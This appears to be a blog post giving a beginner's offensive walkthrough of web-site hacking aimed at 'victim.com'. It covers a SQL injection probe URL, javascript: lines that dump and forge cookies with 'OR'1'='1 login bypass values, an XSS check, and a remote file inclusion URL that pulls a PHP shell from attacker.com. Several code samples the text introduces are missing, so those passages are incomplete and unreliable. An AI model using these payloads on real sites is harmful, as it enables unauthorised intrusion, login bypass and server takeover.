Enumeration Website Hacking

1. Check for SQL Injection vulnerabilities
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

Like this:

http://www.victim.com/news.php?id=1'

If you see some kind of an error, then most likely, the site is vulnerable.
This is classic, or error based SQL Injection. We’ll discuss blind SQL injection another time.

2. Cookie poisoning
Even though most sites nowadays filter this, it wouldn’t kill you to try.
We will do this…with javascript.
It’s really simple, try this in the address bar:

javascript:alert(document.cookie);

In some cases this may spill out your username and password.
This is the part where you try the famous line…

javascript:void(document.cookie="username='OR'1'=' 1"); void(document.cookie="password='OR'1'='1");

Similar to SQL injection, you guessed it.

3. Site with vulnerable to Cross Site Script (XSS)
XSS and javascript together open up a huge horizon of possibilities and a whole lot of new places to discover.
Check if the site is vulnerable by typing this in a webform or something.

//

If site is vulnerable, then you will get a popup message saying awdwdadwd (yes this was random).
You can find more detailed articles on XSS on milw0rm or something.

4. Remote File Inclusion (RFI)
RFI or Remote File Inclusion is where the attacker tries to inject his own PHP code to your PHP apps…and if he’s successful, then he can do whatever he wants on the server.
Ok, so, lets say we have a website coded in PHP and it uses something like page=page.html to see which page is to be displayed. The code will look something like this


What this means is, whatever gets passed to page, it will get included inside the PHP page. Goes like this:

http://www.victim.com/contact.php?page=http://www.attacker.com/phpshell.txt?

The actual code the webserver is executing looks like this:

regards

k3nz0

Advertisements
  1. nice artikel bro ..

  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: